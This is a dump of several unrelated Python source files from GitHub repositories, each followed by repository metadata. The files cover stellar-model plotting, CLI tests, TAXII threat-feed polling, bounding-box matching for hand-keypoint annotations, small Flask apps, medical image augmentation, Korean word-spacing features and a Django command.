color = getattr(Steps, f'{EEP}_c', 'tab:cyan')
ax.plot([pred[x][k, idx] for k in range(len(self.aMLT_list))],
[pred[y][k, idx] for k in range(len(self.aMLT_list))],
ls='-', lw=0.5, c=color, zorder=-1)
ax.plot(data[x][idx], data[y][idx], 'o', c=color, ms=4)
ax.set_xlabel(x)
ax.set_ylabel(y)
Tools.format_axis(ax)
def _visualize_data(self, model_name, pred, data, aMLT_fit):
cmap = mpl.colormaps['summer_r']
norm = mpl.colors.Normalize(vmin=self.aMLT_list[0],
vmax=self.aMLT_list[-1])
colors = [cmap(norm(a)) for a in self.aMLT_list + [aMLT_fit]]
# draw evolutionary tracks
fig, axs = plt.subplots(1, 2)
self._draw_curve(pred, data, axs[0], 'Teff', 'log_L', colors)
self._draw_curve(pred, data, axs[1], 'Teff', 'log_g', colors)
for i in range(2):
fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),
ax=axs[i], orientation='horizontal', label=r'mixing length $\alpha$')
Tools.save_figure(fig, 'tracks')
# draw coordinates
fig, axs = plt.subplots(2, 1)
self._draw_curve(pred, data, axs[0], 'star_age', 'model_number', colors)
self._draw_curve(pred, data, axs[1], 'model_number', 'star_age', colors)
for i in range(2):
fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),
ax=axs[i], orientation='vertical', label=r'ML $\alpha$')
Tools.save_figure(fig, 'coords')
# draw histories
for qty in ReduceModel.QTY_LIST[2:]:
fig, axs = plt.subplots(2, 1)
self._draw_curve(pred, data, axs[0], 'star_age', qty, colors)
self._draw_curve(pred, data, axs[1], 'model_number', qty, colors)
for i in range(2):
fig.colorbar(mpl.cm.ScalarMappable(norm=norm, cmap=cmap),
ax=axs[i], orientation='vertical', label=r'ML $\alpha$')
Tools.save_figure(fig, qty.replace('/', '_'))
Tools.merge_plots(self.outdir, model_name, ['tracks', 'coords'] \
+ [qty.replace('/', '_') for qty in ReduceModel.QTY_LIST[2:]])
def clear(self):
for qty in ReduceModel.QTY_LIST:
for k in range(len(self.aMLT_list)):
self.interp_dict[qty][k].clear()
self.interp_dict[qty].clear()
self.data_dict.clear()
self.interp_dict.clear()
del self.existence, self.data_dict, self.interp_dict
class SynthModel:
def __init__(self, grid: SynthGrid, **kwargs) -> None:
self.grid = grid
self.model_name = f'aMLT={kwargs["aMLT"]:.4f}_{kwargs["mass"]:.2f}M_' \
f'Z={kwargs["Z"]:.4f}_FeH={kwargs["FeH"]:+.2f}'
fpath = grid.indir / f'{self.model_name}.csv'
self.exists = fpath.exists()
if not self.exists:
print(f' > Warning: {self.model_name} does not exist.')
return
self.data = pd.read_csv(fpath, index_col=0)
def clear_data(self):
if self.exists:
del self.data
| kailicao/mesa_apokasc | sim_synth.py | sim_synth.py | py | 8,766 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sim_ctr.RgbGrid.MASS_LIST",
"line_number": 26,
"usage_type": "attribute"
},
{
"api_name": "sim_ctr.RgbGrid",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "sim_ctr.RgbGrid.FEH_LIST",
"line_number": 27,
"usage_type": "attribute"
},
{
"api_... |
496184917 | # -*- coding: utf-8 -*-
import time
import click
from click.testing import CliRunner
from dagster_aws.cli.term import Spinner, Term
def test_term():
def term_helper(term_cmd, prefix, exit_code=0):
@click.command()
def fn():
term_cmd('foo bar')
runner = CliRunner()
result = runner.invoke(fn)
assert result.exit_code == exit_code
assert result.output == prefix + u'foo bar\n'
expected = [
(Term.error, Term.ERROR_PREFIX),
(Term.info, Term.INFO_PREFIX),
(Term.success, Term.SUCCESS_PREFIX),
(Term.waiting, Term.WAITING_PREFIX),
(Term.warning, Term.WARNING_PREFIX),
]
for term_cmd, prefix in expected:
term_helper(term_cmd, prefix)
term_helper(Term.fatal, Term.FATAL_PREFIX, exit_code=1)
def test_spinner(capsys):
with Spinner():
time.sleep(0.5)
captured = capsys.readouterr()
assert captured.out.encode('unicode-escape').startswith(
b'\\u280b\\x08\\u2819\\x08\\u2839\\x08\\u2838\\x08'
)
| helloworld/continuous-dagster | deploy/dagster_modules/libraries/dagster-aws/dagster_aws_tests/cli_tests/test_term.py | test_term.py | py | 1,054 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "click.command",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "click.testing.CliRunner",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "dagster_aws.cli.term.Term.error",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_na... |
32782552053 | import logging
import cabby
from events.stix import parse_stix_package, STIXPackage
def collect_indicator_packages(configuration: dict) -> STIXPackage:
for repository in configuration['repositories']:
yield from poll_repository(repository)
def poll_repository(repository: dict) -> list:
logging.debug("Connecting to %s", repository['name'])
client = cabby.create_client(**repository['client'])
collections = (c for c in client.get_collections()
if c.name not in repository.get('exclusions', ()))
for collection in collections:
yield from poll_collection(client, collection.name)
logging.info("Repository %s exhausted", repository['name'])
def poll_collection(client: cabby.Client11, collection_name: str) -> list:
packages = 0
indicators = 0
logging.debug("Polling from collection %s", collection_name)
for block in client.poll(collection_name=collection_name):
package = parse_stix_package(block.content)
if package is not None:
packages += 1
indicators += len(package.indicators)
yield package
logging.info("Collection %s: Packages %d - IOCs %d",
collection_name, packages, indicators)
| noxdafox/iocep | events/taxii.py | taxii.py | py | 1,252 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "events.stix.STIXPackage",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "logging.debug",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cabby.create_client",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "logging.info... |
21518376045 | from __future__ import division
import scipy.optimize
import numpy as np
import json
import re
import cv2
_BLACK = (0, 0, 0)
_RED = (0, 0, 255)
_BLUE = (255, 0, 0)
_PURPLE = (204, 0, 153)
_ORANGE = (51, 153, 255)
_LBROWN = (0, 153, 230)
keypoint_colors = { '1': _RED, '2': _RED, '3': _RED, '4': _RED, '5': _RED,
'6': _ORANGE, '7': _ORANGE, '8': _ORANGE, '9': _ORANGE,
'10': _LBROWN, '11': _LBROWN, '12': _LBROWN, '13': _LBROWN,
'14': _BLUE, '15': _BLUE, '16': _BLUE, '17': _BLUE,
'18': _PURPLE, '19': _PURPLE, '20': _PURPLE, '21': _PURPLE
}
def bbox_iou(boxA, boxB):
# https://www.pyimagesearch.com/2016/11/07/intersection-over-union-iou-for-object-detection/
# ^^ corrected.
# Determine the (x, y)-coordinates of the intersection rectangle
xA = max(boxA[0], boxB[0])
yA = max(boxA[1], boxB[1])
xB = min(boxA[2], boxB[2])
yB = min(boxA[3], boxB[3])
interW = xB - xA + 1
interH = yB - yA + 1
# Correction: reject non-overlapping boxes
if interW <=0 or interH <=0 :
return -1.0
interArea = interW * interH
boxAArea = (boxA[2] - boxA[0] + 1) * (boxA[3] - boxA[1] + 1)
boxBArea = (boxB[2] - boxB[0] + 1) * (boxB[3] - boxB[1] + 1)
iou = interArea / float(boxAArea + boxBArea - interArea)
return iou
def match_bboxes(bbox_gt, bbox_pred, IOU_THRESH=0.05):
'''
Given sets of true and predicted bounding-boxes,
determine the best possible match.
Parameters
----------
bbox_gt, bbox_pred : N1x4 and N2x4 np array of bboxes [x1,y1,x2,y2].
The number of bboxes, N1 and N2, need not be the same.
Returns
-------
(idxs_true, idxs_pred, ious, labels)
idxs_true, idxs_pred : indices into gt and pred for matches
ious : corresponding IOU value of each match
labels: vector of 0/1 values for the list of detections
'''
n_true = bbox_gt.shape[0]
n_pred = bbox_pred.shape[0]
MAX_DIST = 1.0
MIN_IOU = 0.0
# NUM_GT x NUM_PRED
iou_matrix = np.zeros((n_true, n_pred))
for i in range(n_true):
for j in range(n_pred):
iou_matrix[i, j] = bbox_iou(bbox_gt[i,:], bbox_pred[j,:])
if n_pred > n_true:
# there are more predictions than ground-truth - add dummy rows
diff = n_pred - n_true
iou_matrix = np.concatenate( (iou_matrix,
np.full((diff, n_pred), MIN_IOU)),
axis=0)
if n_true > n_pred:
# more ground-truth than predictions - add dummy columns
diff = n_true - n_pred
iou_matrix = np.concatenate( (iou_matrix,
np.full((n_true, diff), MIN_IOU)),
axis=1)
# call the Hungarian matching
idxs_true, idxs_pred = scipy.optimize.linear_sum_assignment(1 - iou_matrix)
if (not idxs_true.size) or (not idxs_pred.size):
ious = np.array([])
else:
ious = iou_matrix[idxs_true, idxs_pred]
# remove dummy assignments
sel_pred = idxs_pred<n_pred
idx_pred_actual = idxs_pred[sel_pred]
idx_gt_actual = idxs_true[sel_pred]
ious_actual = iou_matrix[idx_gt_actual, idx_pred_actual]
sel_valid = (ious_actual > IOU_THRESH)
label = sel_valid.astype(int)
return idx_gt_actual[sel_valid], idx_pred_actual[sel_valid], ious_actual[sel_valid], label
def cull_annotations():
gt = json.load(open("train_validated_keypoints_only.json", "r"))
boot = json.load(open("hand_keypoints_train_bootstrap.json", "r"))
# for each image in GT, find entries in boot
gt_images = gt["images"]
gt_anns = {}
boot_anns = {}
boot_imgs = {}
max_img_id = 0
max_ann_id = 0
for img in gt_images:
img_id = img["id"]
# if img_id > max_img_id:
# max_img_id = img_id
img["id"] = max_img_id + 1
gt_anns[img["file_name"]] = []
for ann in gt["annotations"]:
# if ann["id"] > max_ann_id:
# max_ann_id = ann["id"]
if ann["image_id"] == img_id:
ann["image_id"] = img["id"]
ann["id"] = max_ann_id
gt_anns[img["file_name"]].append(ann)
max_ann_id += 1
max_img_id += 1
for img in boot["images"]:
img_id = img["id"]
boot_imgs[img["file_name"]] = img
boot_anns[img["file_name"]] = []
for ann in boot["annotations"]:
if ann["image_id"] == img_id:
boot_anns[img["file_name"]].append(ann)
boot_new_images = []
count = 0
total = 0
imgs_to_remove = set()
for gt_img in gt_images:
img_name = gt_img["file_name"]
vid_id = re.sub("-\d{9}.jpg", "", img_name)
frame = int(re.search("\d{9}", img_name).group())
boot_frames = set(["{vid_id}-{frame:09d}.jpg".format(vid_id=vid_id, frame=frame+i) for i in range(-5, 6)])
boot_frames.remove(img_name)
# for each entry in boot, match bboxes (x, y, w, h)
gt_bboxes = []
for x in gt_anns[img_name]:
gt_bboxes.append([x["bbox"][0], x["bbox"][1], x["bbox"][0] + x["bbox"][2], x["bbox"][1] + x["bbox"][3]])
gt_bboxes = np.array(gt_bboxes)
for f in boot_frames:
boxes = []
if f not in boot_anns:
continue
# reassign image
boot_imgs[f]["id"] = max_img_id + 1
for x in boot_anns[f]:
boxes.append([x["bbox"][0], x["bbox"][1], x["bbox"][0] + x["bbox"][2], x["bbox"][1] + x["bbox"][3]])
boxes = np.array(boxes)
idx_true, idxs_pred, ious, labels = match_bboxes(gt_bboxes, boxes)
total += 1
if len(idxs_pred) >= 1:
count += 1
# image_debug = cv2.imread("./bootstrap/" + f)
# find matched boxes + corresponding annotations
gt_using = [gt_anns[img_name][xi] for xi in idx_true]
boot_using = [boot_anns[f][xi] for xi in idxs_pred]
# eliminate keypoints
remove_idxs = []
using = []
for b in range(len(boot_using)):
gt_ann = gt_using[b]
boot_ann = boot_using[b]
boot_ann["image_id"] = max_img_id + 1
boot_ann["id"] = max_ann_id + 1
keypoints = boot_ann["keypoints"]
for i in range(21):
if gt_ann["keypoints"][i * 3 + 2] == 0:
keypoints[i * 3] = 0
keypoints[i * 3 + 1] = 0
keypoints[i * 3 + 2] = 0
# else:
# cv2.circle(image_debug, (int(keypoints[i * 3]), int(keypoints[i * 3 + 1])), 4, keypoint_colors[str(i + 1)], -1)
# cv2.putText(image_debug, str(i + 1), (int(keypoints[i * 3] - 4), int(keypoints[i * 3 + 1] - 4)), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 1, cv2.LINE_AA)
if sum(keypoints) == 0:
remove_idxs.append(b)
continue
using.append(boot_ann)
boot_ann["keypoints"] = keypoints
box = boot_ann["bbox"]
# cv2.rectangle(image_debug, (int(box[0]), int(box[1])), (int(box[2] + box[0]) , int(box[3] + box[1])), color=(0, 255, 0),thickness=3)
# cv2.rectangle(image_debug, (int(box[0]), int(box[1])), (int(box[2]) , int(box[3])), color=(0, 255, 0),thickness=3)
# fix error bbox coco error here # Error is in train _bootstrap
boot_ann["bbox"] = [box[0], box[1], box[2] - box[0], box[3] - box[1]] # x y w h
boot_ann["area"] = (box[2] - box[0]) * (box[3] - box[1])
max_ann_id += 1
# remove image if no more annotations
if len(remove_idxs) == len(boot_using):
imgs_to_remove.add(f)
# boot_using = [x for i, x in enumerate(boot_using) if i not in remove_idxs]
# add to new annotations
boot_new_images.extend(using)
# save image for debugging
# cv2.imwrite("./debug_bootstrap_train_filter/debug_" + f, image_debug)
else:
# eliminate image
imgs_to_remove.add(f)
print(f)
max_img_id += 1
print(len(boot_new_images))
boot["annotations"] = boot_new_images
for v in gt_anns.values():
boot["annotations"].extend(v)
print(len(boot["annotations"]))
boot["images"] = list(boot_imgs.values())
boot["images"].extend(gt["images"])
print(len(boot["images"]), len(imgs_to_remove), len(gt["images"]))
removed = set()
imgs_cpy = list(boot["images"])
for img in imgs_cpy:
if img["file_name"] in imgs_to_remove:
boot["images"].remove(img)
removed.add(img["id"])
if img in gt["images"]:
print("overlap")
print(len(boot["images"]), len(boot["annotations"]))
# remove annotations on removed images
cpy = list(boot["annotations"])
for ann in cpy:
if ann["image_id"] in removed:
boot["annotations"].remove(ann)
print("hi")
json.dump(boot, open("train_boostrap_filtered_validated_2.json", "w"))
print(count, total)
# get rid of unmatched boxes
# get rid of keypoints that aren't labled, occluded, w/in a certain distance
# write to image so you can see what they now look like
cull_annotations()
| egoodman92/semi-supervised-surgery | MULTITASK_FILES/KEYPOINTS_FILES/surgery-hand-detection-new/scripts/filter_bootstrap.py | filter_bootstrap.py | py | 8,359 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "numpy.zeros",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.full",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "numpy.concatenate",
"lin... |
23642938118 | from flask import Flask,render_template,request,redirect,session,flash
app = Flask(__name__)
app.secret_key = 'Farn'
@app.route ('/')
def index():
return render_template('index.html')
@app.route ('/result', methods=['POST'])
def result():
if len(request.form['name']) < 1:
flash("Name cannot be empty!")
return redirect('/')
# else:
# flash("Success! Your name is {}".format(request.form['name']))
elif len(request.form['comment']) < 1:
flash("Comments cannot be empty!")
return redirect('/')
elif len(request.form['comment']) >= 120:
flash("Comments cannot be longer than 120 char.!")
return redirect('/')
else:
flash("Success!")
return render_template('result.html', name = request.form['name'], location = request.form['location'], language = request.form['language'], comment = request.form['comment'])
app.run(debug = True)
| bmcconchie/DojoAssignments | Python/Flask/python_stack/flask_fundamentals/dataform/server.py | server.py | py | 946 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "flask.request.form",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "flask.request... |
17305255074 | # -*- coding: utf-8 -*-
"""
Created on Tue Sep 7 17:46:55 2021
@author: Administrator
"""
import SimpleITK as sitk
import numpy as np
import os
import cv2
from shutil import copyfile
import random
num=379
lists=['train_002_0000.nii.gz','train_019_0000.nii.gz','train_069_0000.nii.gz','train_101_0000.nii.gz','train_114_0000.nii.gz','train_127_0000.nii.gz','train_150_0000.nii.gz','train_134_0000.nii.gz','train_174_0000.nii.gz','train_195_0000.nii.gz']
for name in lists:
num=num+1
copyfile(os.path.join(r'.\data\Raw\TrainingImg',name),os.path.join(r'.\data\Raw\TrainingImg','train_'+str(num)+'_0000.nii.gz'))
copyfile(os.path.join(r'.\data\Raw\TrainingMask',name.replace('_0000','')),os.path.join(r'.\data\Raw\TrainingMask','train_'+str(num)+'.nii.gz'))
num=num+1
img=sitk.ReadImage(os.path.join(r'.\data\Raw\TrainingImg',name))
mask=sitk.ReadImage(os.path.join(r'.\data\Raw\TrainingMask',name.replace('_0000','')))
imgarr=sitk.GetArrayFromImage(img)
maskarr=sitk.GetArrayFromImage(mask)
imgarr1=imgarr.copy()
imgarr1[maskarr!=2]=0
imgarr2=imgarr1.copy()
imgarr2[imgarr2>50]=0
for i in range(imgarr2.shape[0]):
for j in range(imgarr2.shape[1]):
for k in range(imgarr2.shape[2]):
if imgarr2[i,j,k]!=0:
imgarr2[i,j,k]=imgarr2[i,j,k]+random.randint(100,150)
imgarr1[imgarr1<=50]=0
imgarr1=imgarr1+imgarr2
imgarr[maskarr==2]=0
imgarr=imgarr+imgarr1
saveimg=sitk.GetImageFromArray(imgarr)
saveimg.SetSpacing(img.GetSpacing())
saveimg.SetDirection(img.GetDirection())
saveimg.SetOrigin(img.GetOrigin())
sitk.WriteImage(saveimg,os.path.join(r'.\data\Raw\TrainingImg','train_'+str(num)+'_0000.nii.gz'))
sitk.WriteImage(mask,os.path.join(r'.\data\Raw\TrainingMask','train_'+str(num)+'.nii.gz')) | xyndameinv/FLARE21 | process0.py | process0.py | py | 1,837 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "shutil.copyfile",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "shutil.copyfile",
"line... |
31734592611 | from modules import aws_sript, firestorage_code
import os
from flask import Flask, jsonify
from flask import render_template, request, redirect, url_for
from werkzeug.utils import secure_filename
import os, shutil
from flask_cors import CORS
from decorater_file import crossdomain
global app
app = Flask(__name__)
CORS(app)
app.config['SECRET_KEY'] = 'the quick brown fox jumps over the lazy dog'
app.config['CORS_HEADERS'] = ['Content-Type']
cors = CORS(app, resources={r"/*": {"origins": "*"}})
# Create a directory in a known location to uploaded files to.
uploads_dir = os.path.join(app.instance_path, 'uploads')
if not os.path.exists(uploads_dir):
os.makedirs(uploads_dir)
# Create a directory in a known location to processed files to.
ml_output_dir = os.path.join(app.instance_path, 'ml_output')
if not os.path.exists(ml_output_dir):
os.makedirs(ml_output_dir)
@app.route('/upload', methods=['GET', 'POST'])
def upload():
if request.method == 'POST':
# save the single "profile" file
image = request.files['image']
print(image)
img_path = os.path.join(uploads_dir, secure_filename(image.filename))
ml_out_img_path = os.path.join(ml_output_dir, secure_filename(image.filename))
image.save(img_path)
print("img_path",img_path)
print("ml_out_img_path",ml_out_img_path)
# ML model start
print("Processing...")
aws_sript.convert_image(img_path, ml_out_img_path)
# ML model ends
print("Image converted successfully")
img_url = firestorage_code.upload_img(ml_out_img_path)
print("Image uploaded to firebase storage successfully")
print("Firebase Image URL ",img_url)
# cleaning folders
clean_folders()
# save each "charts" file
# for file in request.files.getlist('upload'):
# print(file.name)
# file.save(os.path.join(uploads_dir, file.name))
# return redirect(url_for('upload'))
data = {
"img_url":img_url
}
return jsonify(data),{'Access-Control-Allow-Origin': '*'}
def clean_folders():
folders = [uploads_dir,ml_output_dir]
for folder in folders:
for filename in os.listdir(folder):
file_path = os.path.join(folder, filename)
try:
if os.path.isfile(file_path) or os.path.islink(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print('Failed to delete %s. Reason: %s' % (file_path, e))
if __name__ == '__main__':
app.run(debug=True) | akhlaq1/flask-aws-face-detect-api | app.py | app.py | py | 2,784 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_... |
20019809326 | #file used to take screenshot to baseline rectangle mappings off of
import cv2
cam = cv2.VideoCapture(0)
result, image = cam.read()
if result:
cv2.imshow("img_to_map", image)
cv2.imwrite("img_to_map.png", image)
cv2.waitKey(0)
cv2.destroyWindow("img_to_map")
else:
print("No image detected. Please! try again") | thqtcher/physical-computing-final | app/config/python/screenshotter.py | screenshotter.py | py | 346 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "cv2.VideoCapture",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "cv2.imwrite",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number... |
7615563038 | # -*- coding: utf-8 --
import re
import math
from multiprocessing import cpu_count, freeze_support
from multiprocessing.pool import Pool
import sys
from util import read_text_lines
from util import refine_line
from char2vec import load_model
B = 1
I = 0
'''
1. word2vec 모델 불러오기(from char2vec)
'''
def is_hangul(ch):
codepoint = ord(ch) if isinstance(ch, str) else int(ch)
return codepoint >= 0xac00 and codepoint <= 0xd7a3
def is_ascii(ch):
codepoint = ord(ch) if isinstance(ch, str) else int(ch)
return codepoint >= 0x20 and codepoint <= 0x7e
def ch2num(ch):
codepoint = ord(ch) if isinstance(ch, str) else ch
if is_hangul(ch):
return codepoint - ord('가') + 256
elif is_ascii(ch):
return codepoint
else:
return None
def get_features(line_ch, i):
X = [0 for i in range(6)]
if i > 2:
X[0] = ch2num(line_ch[i - 2])
if i > 1:
X[1] = ch2num(line_ch[i - 1])
X[2] = ch2num(line_ch[i])
if i < len(line_ch) - 1:
X[3] = ch2num(line_ch[i + 1])
if i < len(line_ch) - 2:
X[4] = ch2num(line_ch[i + 2])
# 문장의 시작 위치 기록
if i == 0:
X[5] = 1
else:
X[5] = 0
return X
def raw2corpus(raw_sentence):
taggeds = []
text = re.sub(r'(\ )+', ' ', raw_sentence).strip()
for i in range(len(text)):
if i == 0:
taggeds.append('{}/B'.format(text[i]))
elif text[i] != ' ':
successor = text[i - 1]
if successor == ' ':
taggeds.append('{}/B'.format(text[i]))
else:
taggeds.append('{}/I'.format(text[i]))
return ' '.join(taggeds)
def corpus2sent(line):
sent = []
tokens = line.split(' ')
for token in tokens:
if '/' not in token:
continue
word, tag = token.split('/')
sent.append((word, tag))
return sent
# 이건 사용 안함
char2vec_model = load_model(r'./char2vec_Etri_d30.txt')
ngram2vec_models = []
for n in range(1, 4):
#ngram2vec_models.append(load_model(r'./char2vec_Etri_d30_{}gram.txt'.format(n)))
#ngram2vec_models.append(load_model(r'./char2vec_ted_d40_{}gram.txt'.format(n)))
ngram2vec_models.append(load_model(r'./char2vec_MDM001_d40_{}gram.txt'.format(n)))
def char2vec(ch):
n = len(ch)
return [float(f) for f in ngram2vec_models[n-1][ch]]
# 조화 평균
def hmean(values):
top = float(len(values))
bottom = 0.0
for v in values:
top *= v
bottom += v
return top / bottom
# 산술 평균
def amean(values):
s = 0.0
for v in values:
s += v
return v / len(values)
# 기하 평균
def gmean(values):
m = 1
for v in values:
m *= v
r = m ** (1.0/float(len(values)))
return r
def index2feature(line, i, offsets):
'''
해당 offset에 위치한 글자의 word embedding 벡터를 가져온다.
offset이 여러 개 있으면 중간값이나 평균(산술, 조화 등)값으로 합쳐서 실험해보기
* 중간값: 다른 조합인데 같은 걸로 취급될 수 있는 경우가 있으므로 빼기
* 실험1 --> 산술평균: (a + b + c) / 3
* 실험2 --> 조화평균: 3*a*b*c / (a + b + c) --> 모두 양수일때만 의미있는 결과 나옴
* 실험3 --> 기하평균: sqrt3(a * b * c)
※ 기하평균 --> 곱해야 하는 값의 평균 구할때 사용(예: 은행 n년간 평균 이자 계산 등)
'''
vec = []
for off in offsets:
if i + off < 0 or i + off >= len(line):
return [0.0 for i in range(50)]
ch, _ = line[i + off]
vec.append(char2vec_model[ch])
result = []
for i in range(len(vec[0])):
v = []
for j in range(len(vec)):
v.append(float(vec[j][i]))
result.append(amean(v))
return result
# 다른 논문 참고한 자질에서 2개이상 글자에 해당하는 임베딩은 각 글자의
# 임베딩 정보를 평균낸걸로 만든 자질
def generate_feature(args):
line = args[0]
i = args[1]
feature = []
feature += index2feature(line, i, [-1])
feature += index2feature(line, i, [0])
feature += index2feature(line, i, [1])
feature += index2feature(line, i, [-2, -1])
feature += index2feature(line, i, [-1, 0])
feature += index2feature(line, i, [0, 1])
feature += index2feature(line, i, [-2, -1, 0])
feature += index2feature(line, i, [-1, 0, 1])
feature += index2feature(line, i, [0, 1, 2])
return feature
# 앞 2글자부터 뒤2글자까지 각 한글자씩의 임베딩 정보를 자질로 사용한 것
def generate_feature2(args):
line = args[0]
i = args[1]
feature = []
if i >= 2:
ch, _ = line[i - 2]
feature += char2vec(ch)
else:
feature += [0.0 for i in range(30)]
if i >= 1:
ch, _ = line[i - 1]
feature += char2vec(ch)
else:
feature += [0.0 for i in range(30)]
ch, _ = line[i]
feature += char2vec(ch)
if i < len(line) - 1:
ch, _ = line[i + 1]
feature += char2vec(ch)
else:
feature += [0.0 for i in range(30)]
if i < len(line) - 2:
ch, _ = line[i + 2]
feature += char2vec(ch)
else:
feature += [0.0 for i in range(30)]
return feature
# 타 논문 참고한 자질에서 여러 글자에 해당하는 임베딩 정보를 추가한 자질
def generate_feature3(args):
line = ''.join([l[0] for l in args[0]])
i = args[1]
dim = 40
feature = []
# 1-gram
feature += char2vec(line[i-1]) if i >= 1 else [0.0 for a in range(dim)]
feature += char2vec(line[i])
feature += char2vec(line[i+1]) if i < len(line)-1 else [0.0 for a in range(dim)]
# 2-gram
feature += char2vec(line[i-2:i]) if i >= 2 else [0.0 for a in range(dim)]
feature += char2vec(line[i-1:i+1]) if i >= 1 else [0.0 for a in range(dim)]
feature += char2vec(line[i:i+2]) if i < len(line)-1 else [0.0 for a in range(dim)]
# 3-gram
feature += char2vec(line[i-2:i+1]) if i >= 2 else [0.0 for a in range(dim)]
feature += char2vec(line[i-1:i+2]) if i >= 1 and i < len(line)-1 else [0.0 for a in range(dim)]
feature += char2vec(line[i:i+3]) if i < len(line)-2 else [0.0 for a in range(dim)]
return feature
def generate_feature4(args):
line = ''.join([l[0] for l in args[0]])
i = args[1]
dim = 40
feature = []
# 1-gram
feature += char2vec(line[i])
feature += char2vec(line[i-1]) if i >= 1 else [0.0 for a in range(dim)]
feature += char2vec(line[i+1]) if i < len(line)-1 else [0.0 for a in range(dim)]
# 2-gram
feature += char2vec(line[i-2:i]) if i >= 2 else [0.0 for a in range(dim)]
feature += char2vec(line[i-1:i+1]) if i >= 1 else [0.0 for a in range(dim)]
feature += char2vec(line[i:i+2]) if i < len(line)-1 else [0.0 for a in range(dim)]
feature += char2vec(line[i+1:i+3]) if i < len(line)-2 else [0.0 for a in range(dim)]
# 3-gram
feature += char2vec(line[i-2:i+1]) if i >= 2 else [0.0 for a in range(dim)]
feature += char2vec(line[i-1:i+2]) if i >= 1 and i < len(line)-1 else [0.0 for a in range(dim)]
feature += char2vec(line[i:i+3]) if i < len(line)-2 else [0.0 for a in range(dim)]
feature += char2vec(line[i+1:i+4]) if i < len(line)-3 else [0.0 for a in range(dim)]
return feature
def make_data(pool, fname):
lines = read_text_lines(fname)
lines = (refine_line(line) for line in lines)
corpus = (raw2corpus(line) for line in lines)
sent = (corpus2sent(line) for line in corpus)
X = []
Y = []
for line in sent:
X += pool.map(generate_feature4, [(line, i) for i in range(len(line))])
Y += [(1 if y == 'B' else 0) for _, y in line]
return X, Y
def make_data_divided(pool, fname):
lines = read_text_lines(fname)
lines = (refine_line(line) for line in lines)
corpus = (raw2corpus(line) for line in lines)
sent = (corpus2sent(line) for line in corpus)
line_cnt = 0
X = []
Y = []
for line in sent:
line_cnt += 1
x = pool.map(generate_feature4, [(line, i) for i in range(len(line))])
X += norm_many(pool, x)
Y += ((1 if y == 'B' else 0) for _, y in line)
if line_cnt == 100000:
yield X, Y
line_cnt = 0
X = []
Y = []
yield X, Y
# todo: 여러 글자의 워드벡터를 더한 것을 고려해서 수정하기
def norm(arr):
return [round(x*1000, 0) + 10000 for x in arr]
def norm_many(pool, X):
return list(pool.map(norm, X))
def main():
for i in range(1, 4):
char2vec_model = load_model(r'./char2vec_ted_d40_{}gram.txt'.format(i))
min_v = 0.0
max_v = 0.0
for k in char2vec_model.wv.vocab.keys():
vec = char2vec_model.wv[k]
for v in vec:
if v < min_v:
min_v = v
elif v > max_v:
max_v = v
print('#{}: min={}, max={}'.format(i, min_v, max_v))
#sys.exit(1)
pool = Pool(processes=cpu_count())
X, Y = make_data(pool, r'./ted_7_ErasePunc_FullKorean__train.txt')
print(X[:5])
print(Y[:5])
if __name__ == '__main__':
freeze_support()
main()
| kimwansu/autospacing_tf | make_data.py | make_data.py | py | 9,337 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.sub",
"line_number": 70,
"usage_type": "call"
},
{
"api_name": "char2vec.load_model",
"line_number": 97,
"usage_type": "call"
},
{
"api_name": "char2vec.load_model",
"line_number": 104,
"usage_type": "call"
},
{
"api_name": "util.read_text_lines"... |
74144288102 | from django.core.management.base import BaseCommand
import os
from importlib import import_module
from django.conf import settings
from django.core.management import call_command
from newapp.utils import get_app_template_path, get_app_templates
APP_TEMPLATES = [ x.get('name') for x in get_app_templates() ]
class Command(BaseCommand):
"""
Example usage:
python manage.py newapp mambu --template=lite --appsdir=apps
"""
help = __doc__
args = '<function arg arg ...>'
def check_name_conflick(self, name):
apps_list = next(os.walk(os.path.join(settings.BASE_DIR, "apps")))[1]
apps_list = apps_list +['admin', 'admindocs', 'auth' ,'contenttypes' ,'flatpages','gis','humanize',
'messages','postgres','redirects','sessions','sitemaps','sites','staticfiles'
'syndication']
if name in apps_list:
return True
else:
try:
import_module(name)
except ImportError:
return False
else:
return True
def add_arguments(self, parser):
parser.add_argument('name', type=str)
parser.add_argument('--apptype', '-t', dest='apptype', default='lite',
help='Application type')
parser.add_argument('--appdir', '-d', type=str, dest='appdir', default='/',
help='Target directory')
